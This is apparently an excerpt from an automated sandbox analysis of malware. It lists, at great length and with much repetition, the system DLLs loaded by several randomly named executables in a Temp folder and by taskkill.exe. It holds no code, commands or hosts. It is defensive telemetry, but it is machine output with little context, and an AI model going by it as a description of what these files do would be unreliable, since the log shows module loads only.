                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeSection loaded: msimg32.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeSection loaded: msvcr100.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeSection loaded: webio.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exeSection loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exeSection loaded: winmm.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exeSection loaded: wininet.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exeSection loaded: rstrtmgr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exeSection loaded: ncrypt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exeSection loaded: ntasn1.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exeSection loaded: iertutil.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exeSection loaded: wldp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exeSection loaded: profapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exeSection loaded: winhttp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exeSection loaded: iphlpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exeSection loaded: winnsi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exeSection loaded: urlmon.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exeSection loaded: srvcli.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exeSection loaded: netutils.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeSection loaded: winmm.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeSection loaded: winhttp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeSection loaded: webio.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeSection loaded: iphlpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeSection loaded: winnsi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeSection loaded: rasadhlp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeSection loaded: schannel.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeSection loaded: mskeyprotect.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeSection loaded: ntasn1.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeSection loaded: ncrypt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeSection loaded: ncryptsslp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeSection loaded: msasn1.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeSection loaded: cryptsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeSection loaded: rsaenh.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeSection loaded: cryptbase.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeSection loaded: gpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeSection loaded: dpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeSection loaded: uxtheme.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeSection loaded: wbemcomn.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeSection loaded: amsi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeSection loaded: userenv.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeSection loaded: profapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeSection loaded: version.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: wsock32.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: version.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: winmm.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: mpr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: wininet.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: iphlpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: userenv.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: uxtheme.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: wldp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: rasadhlp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: profapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: fwpuclnt.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
